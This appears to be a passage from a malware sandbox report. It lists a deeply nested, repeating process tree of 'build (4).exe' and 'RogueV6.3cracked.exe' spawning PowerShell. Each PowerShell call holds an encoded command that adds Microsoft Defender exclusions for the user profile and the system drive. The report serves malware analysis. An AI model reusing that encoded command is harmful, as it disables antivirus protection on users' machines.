        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        141⤵
        
        PID:9736
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        141⤵
        
        PID:9756
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        141⤵
        System Location Discovery: System Language Discovery
        
        PID:9812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        142⤵
        
        PID:10012
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        142⤵
        
        PID:10020
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        142⤵
        
        PID:10036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        143⤵
        
        PID:10216
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        143⤵
        
        PID:9244
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        143⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        144⤵
        System Location Discovery: System Language Discovery
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        144⤵
        
        PID:6328
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        144⤵
        
        PID:9416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        145⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        145⤵
        
        PID:9576
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        145⤵
        
        PID:9284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        146⤵
        
        PID:9956
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        146⤵
        
        PID:9828
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        146⤵
        
        PID:9928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        147⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        147⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        147⤵
        
        PID:6420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        148⤵
        
        PID:8776
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        148⤵
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        148⤵
        
        PID:8688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        149⤵
        
        PID:8900
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        149⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        149⤵
        
        PID:2976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        150⤵
        
        PID:3240
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        151⤵
        
        PID:7856
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        150⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        150⤵
        
        PID:8832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        151⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        151⤵
        
        PID:7736
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        151⤵
        System Location Discovery: System Language Discovery
        
        PID:9604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        152⤵
        
        PID:10196
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        152⤵
        
        PID:7928
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        152⤵
        System Location Discovery: System Language Discovery
        
        PID:7924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        153⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        153⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        153⤵
        
        PID:7760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        154⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        154⤵
        
        PID:7744
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        154⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        155⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        155⤵
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        155⤵
        
        PID:9192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        156⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        156⤵
        System Location Discovery: System Language Discovery
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        156⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        157⤵
        System Location Discovery: System Language Discovery
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        157⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        157⤵
        
        PID:9712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        158⤵
        
        PID:9532
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        158⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        158⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        159⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        159⤵
        System Location Discovery: System Language Discovery
        
        PID:7256
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        159⤵
        
        PID:7512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        160⤵
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        160⤵
        
        PID:8956
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        160⤵
        System Location Discovery: System Language Discovery
        
        PID:9648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        161⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        161⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        161⤵
        System Location Discovery: System Language Discovery
        
        PID:4048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        162⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        162⤵
        
        PID:9836
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        162⤵
        
        PID:7824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        163⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        163⤵
        System Location Discovery: System Language Discovery
        
        PID:9632
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        163⤵
        
        PID:9496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        164⤵
        
        PID:6856
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        165⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        164⤵
        System Location Discovery: System Language Discovery
        
        PID:10196
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        164⤵
        
        PID:6584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        165⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        165⤵
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        165⤵
        
        PID:9492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        166⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        166⤵
        
        PID:8244
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        166⤵
        
        PID:9556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        167⤵
        System Location Discovery: System Language Discovery
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        167⤵
        
        PID:9888
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
